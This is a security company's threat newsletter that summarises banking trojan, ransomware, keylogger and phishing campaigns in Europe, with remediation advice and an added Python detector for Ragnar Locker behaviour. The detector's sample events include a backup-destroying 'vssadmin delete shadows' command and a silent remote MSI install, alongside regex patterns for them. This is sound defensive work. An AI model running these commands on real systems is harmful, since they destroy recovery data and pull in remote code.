Threat actors continue to evolve their tactics, techniques, and procedures to see their plans to fruition. Besides abusing white-listed service providers, recent cyberattacks have also adopted steganography, virtual machines, and PowerPoint add-ins to increase their chance of success.



This week’s newsletter will cover:

  • Attacks against individuals and companies in Europe
  • Attacks using Microsoft PowerPoint add-ins
  • Attacks impersonating Google


Attacks against individuals and companies in Europe

Besides Spain, Portugal has now experienced a series of phishing campaigns infecting the machines of unsuspecting users with the “Grandoreiro” banking trojan. The individuals’ names have been included in the file names of the malicious attachments to improve the click rate.

A fresh ransomware strain known as “Unicorn” has leveraged the rollout of Italy’s official COVID-19 contact tracing app – “Immuni” – to distribute a beta version of a desktop application purporting to be from the Italian Pharmacist Federation.

A recent version of the “Valak” malware has been used against enterprises in Germany. According to security researchers, the primary goal has been to steal Microsoft Exchange server mailing information, passwords, and certificates.

A variant of the “Zeus” banking trojan has been distributed in Germany and Poland using Coronavirus-related lures and fake invoices.

Remediation: Educate employees on the risks of phishing.


The “Ragnar Locker” ransomware has lately been seen deploying itself within a Windows XP SP3 virtual machine, a new approach to evading detection. The threat actors use a Group Policy task to execute a Microsoft Installer that downloads and silently installs an unsigned package from a remote server. The package (1) installs an old version of Oracle VirtualBox, (2) stores the virtualization software and the virtual disk image within the "C:\Program Files (x86)\VirtualAppliances" directory to appear legitimate, and (3) deploys several files to disable Windows AutoPlay notifications, to delete volume shadow copies, and to enumerate connected drives so that they can be accessed by the virtual machine. “Ragnar Locker” is executed with a batch file from the startup folder to maintain a foothold after reboot.

Remediation: Use endpoint protection. Frequently back up critical information. Scan other environments for similar infections. Check for the availability of a decryption tool, verifying its origin before executing it as there have been cases of advertised malware removal software that has been intentionally infected. Avoid ransom payment and notify law enforcement.
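The following Python is an added example, not code from the original newsletter or the cited researchers. It correlates process-creation events per host against the “Ragnar Locker” behaviours described above and flags a host only when several of them co-occur. The event tuple layout, host names, URLs and file names are constructed assumptions; only the VirtualAppliances directory comes from the text.

```python
import re
from collections import defaultdict

# Directory named in the report above (compared case-insensitively).
VA_DIR = "c:\\program files (x86)\\virtualappliances\\"
URL = re.compile(r"https?://")
QUIET = re.compile(r"\s[/-](?:qn?|quiet)(?=\s|$)")          # msiexec silent switches
SHADOW = re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows")
STARTUP = re.compile(r"\\start menu\\programs\\startup\\[^\"]+\.(?:bat|cmd)")

# Constructed sample events: (host, image path, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("WS-014", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /qn /i http://files.example.invalid/package.msi"),
    ("WS-014", r"C:\Program Files (x86)\VirtualAppliances\VBoxHeadless.exe",
     r"VBoxHeadless.exe --startvm demo-vm"),
    ("WS-014", r"C:\Windows\System32\vssadmin.exe",
     r"vssadmin delete shadows /all /quiet"),
    ("WS-014", r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\run.bat"'),
    # Benign look-alikes: one silent intranet install, one ordinary VirtualBox install.
    ("WS-022", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /qn /i https://intranet.example.invalid/agent.msi"),
    ("WS-031", r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
     r"VBoxHeadless.exe --startvm lab"),
]

def classify(image, cmdline):
    """Return the set of described behaviours that one event matches."""
    img, cmd = image.lower(), cmdline.lower()
    hits = set()
    if img.endswith("\\msiexec.exe") and URL.search(cmd) and QUIET.search(cmd):
        hits.add("silent_remote_msi")
    if img.startswith(VA_DIR):
        hits.add("vm_from_virtualappliances")
    if SHADOW.search(cmd):
        hits.add("shadow_copy_deletion")
    if STARTUP.search(cmd):
        hits.add("startup_batch")
    return hits

def suspicious_hosts(events, threshold=2):
    """Hosts showing at least `threshold` distinct behaviours, with the behaviours seen."""
    seen = defaultdict(set)
    for host, image, cmdline in events:
        seen[host] |= classify(image, cmdline)
    return {h: sorted(b) for h, b in seen.items() if len(b) >= threshold}

if __name__ == "__main__":
    print(suspicious_hosts(SAMPLE_EVENTS))
```

Requiring two or more behaviours keeps a lone silent MSI install or a legitimate VirtualBox installation from raising an alert on its own.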


Firms across Italy, Germany, and the United Kingdom supplying equipment and software for industrial organizations, mainly in the energy sector, have been targeted with stealthy credential-stealing campaigns.

Besides the usual culprits such as nefarious macro-laden Microsoft Office documents, obfuscated versions of the password-stealing tool Mimikatz, and PowerShell scripts, the attackers have used three interesting techniques to add a layer of sophistication to their campaigns.

  • First, the emails are written in the target’s language, and the malicious activity kicks in only after ensuring that the computer’s installed language pack matches the language of the phishing email.
  • Second, part of the code is hidden within images downloaded from popular image hosting services such as “imgur.com” or “imgbox.com”. According to security experts, the use of steganography and legitimate services makes it practically impossible to detect the malware using network traffic monitoring tools during the download.
  • Last, researchers have spotted the use of an exception message as the decryption key for the payload to evade sandbox detection and to make the analysis much harder when the OS language used on the victim’s computer is not known.

Remediation: Assess supply chain risk. Educate employees on the risks of phishing emails.


Attacks using Microsoft PowerPoint add-ins

A security researcher has found the “Agent Tesla” keylogger and Remote Access Trojan deployed with the help of a third-party PowerPoint “add-in” disguised as a Microsoft template in a classic phishing email. Unbeknownst to some, PowerPoint “add-ins” allow the execution of macro scripts, which have historically been associated with malicious Excel and Word documents.

Remediation: Educate employees on the risks of phishing emails. Keep an eye on what browser add-ins are installed.


Attacks impersonating Google

Remote workers have been bombarded with tens of thousands of Google-branded cyberattacks in recent months. According to analysts, Google file sharing and storage websites (storage.googleapis.com, docs.google.com, storage.cloud.google.com, drive.google.com) have been adopted in far more credential harvesting campaigns (65%) than those impersonating Microsoft (onedrive.live.com, sway.office.com, forms.office.com) or other brands (e.g. sendgrid.net, mailchimp.com, formcrafts.com).

Remediation: Educate employees on the risks of phishing emails.


As always – be vigilant, stay alert, think twice.

AMATAS will continue to monitor this space and deliver salient information regularly. Stay tuned for our next cyber report and if you are interested in any of our privacy and cybersecurity services, please do reach out through our website www.amatas.com or by e-mailing office@amatas.com.



Amatas, Cyware, The Hacker News, Kaspersky, Info Security, Barracuda Networks, Security Affairs, Threat Post, Agency for Digital Italy Computer Emergency Response Team, Twitter User @JAMESWT_MHT, Twitter User @dottormarc, Tripwire, SANS, Anomali, Proofpoint, Sophos, Google, Microsoft, Creative Commons